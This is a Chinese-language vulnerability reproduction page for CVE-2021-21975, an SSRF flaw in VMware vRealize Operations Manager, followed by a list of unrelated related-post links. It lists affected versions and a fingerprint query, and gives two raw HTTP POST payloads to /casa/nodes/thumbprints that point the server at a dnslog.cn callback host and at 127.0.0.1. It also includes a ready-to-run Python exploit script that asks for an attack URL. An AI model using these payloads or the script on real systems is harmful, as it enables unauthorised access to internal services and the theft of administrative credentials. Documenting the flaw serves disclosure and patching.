VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975、SSRF)
一、漏洞描述
vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),以窃取管理凭据。
二、漏洞影响
vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0
cloud_foundation: 4.x 3.x
vRealize_suite_lifecycle_manager: 8.x
三、漏洞复现
title="vRealize Operations Manager"
访问登录页面如下
发送请求包如下
POST /casa/nodes/thumbprints HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 24["eheeyd.dnslog.cn"]
POST /casa/nodes/thumbprints HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Length: 24["127.0.0.1:443/ui"]
四、漏洞POC
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')print('+ \033[34m公众号 : PeiQi文库 \033[0m')print('+ \033[34mVersion: VMware vRealize Operations Manager \033[0m')print('+ \033[36m使用格式: python3 poc.py \033[0m')print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')print('+ \033[36mDnslog >>> xxx.dnslog.com \033[0m')print('+------------------------------------------')def POC_1(target_url, v):vuln_url = target_url + "/casa/nodes/thumbprints"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/json;charset=UTF-8"}data = '["{}"]'.format(Dnslog)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=10)if response.status_code == 200 :print("\033[32m[o] 目标 {} 可能存在SSRF漏洞,请检查 Dnslog 响应 \033[0m".format(target_url, vuln_url))else:print("\033[31m[x] 目标 {} 不存在漏洞 \033[0m".format(target_url))except Exception as e:print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))if __name__ == '__main__':title()target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))Dnslog = str(input("\033[35mDnslog >>> \033[0m"))POC_1(target_url, Dnslog)
VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975、SSRF)相关推荐
- VMware vRealize Operations Manager的内部版本号(2145975)
Purpose 本文是提供 vRealize Operations Manager 的内部版本号和版本信息. 有关最新信息,请访问 Build numbers and versions of VMwa ...
- VMware vRealize Operations Manager download
前言 VMware vRealize Operations 可提供从应用到基础架构的自动驾驶式 IT 运维管理,以优化.规划及扩展 SDDC 和 VMware Cloud 部署,同时提供对多个公有云的 ...
- VMware vRealize Operations Manager Appliance Install
前言 vRealize Operations Manager 提供跨物理.虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性.使用基本策略的自动化,操作团队实现关键过程的自动化并提高 IT 效 ...
- vrops vRealize Operations Manager 8云管平台部署与配置
1.背景简介 vROPs是Vmware开发的,面向IT管理员的,集监控.分析.告警等多功能合一的管理平台. 它功能强大,不仅能整合运维自家的多个产品,如vSphere.vSAN.NSX等等,还有不少软 ...
- vRealize Operations Manager 安装部署
vRealize Operations Manager 安装部署 https://www.pianshen.com/article/18041671988/ 前话:关于VROPS好不好用的问题,我只想 ...
- 4、vRealize Operations Manager 管理
1.配置密码过期策略 通过web登录到vRealize Operations Manager管理页面 点击 系统管理–访问控制–密码策略,点击编辑 取消所有勾选项,点击确定 2.添加数据源 添加vCe ...
- 2、vRealize Operations Manager 安装
vRealize Operations Manager 安装 在DNS上添加正反向解析记录(该步骤非必需) 登录vCenter Server ,开始导入OVF文件 输入虚拟机名称,选择一个数据中心,点 ...
- 1、vRealize Operations Manager 介绍
vRealize Operations 提供跨物理.虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性.使用基本策略的自动化,操作团队实现关键过程的自动化并提高 IT 效率. 利用从系统资源( ...
- vRealize Operations Manager 仪表板示图
前话:VROPS的最强功能之一,仪表板.VMware 运维超强图示工具,功能强大,参数繁多.本篇不多说,只上几个在用的仪表板图示. 重负载VM仪表板关系图 重负载VM仪表板展示图 运维概览仪表板关系图 ...
最新文章
- 《深入理解计算机系统》读书随笔-位操作
- premiere pr 把切开的视频合并起来
- mysql如何插入新的字段_Mysql 如何 得到新插入的字段ID
- win10关闭“Windows安全中心”功能的两种方法
- c 子类对象 访问父类对象受保护成员_java面向对象总结
- R 梯度提升算法①
- jstat查看JVM的GC情况
- OpenCV中ROI
- 淘宝面试常见问题的答案来了,你看了吗?(一面及答案)
- 汽车故障诊断技术【2】
- StretchDIBits速度测试(COLORONCOLOR)
- python计算无穷级数求和常用公式_[python][计算方法]利用无穷级数计算幂运算(开根号)...
- 手把手教你爬取并下载英雄联盟所有英雄皮肤高清大图
- Git 单文件上传大小限制
- 男士黑色手表的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
- python一元线性回归算法,代码及参数更新动图展示
- 漫威系列-《复联4》
- Gitlab修改文件上传10M大小限制
- 高中数学向量巨难题型四心问题解题技巧
- 中南大学上机:PIPI的DNA序列
热门文章
- linux系统c++编译连接过程,动态库与静态库
- 小波阈值去噪原理及实现
- 岗位多多,招聘 23人 | 中国农业科学院深圳农业基因组研究所诚聘博士后和科研人员...
- Nature子刊:是穷是富与基因有关?大数据分析发现149个与收入相关基因位点
- 生信分析过程中这些常见文件的格式以及查看方式你都知道吗?
- python爬取商城数据_Python爬取新版CRMEB小程序商城后台订单数据,保存为excel
- 学什么c语言标准,C语言的标准 “输入输出”!今天是你学C语言的第几天?
- 数仓dw怎么建_从0建设离线数据仓库
- python优雅编程_Python优雅编程——Collections模块中的高性能数据类型
- Spring Boot笔记-mysql5.7使用@Table后提示doesn't exist问题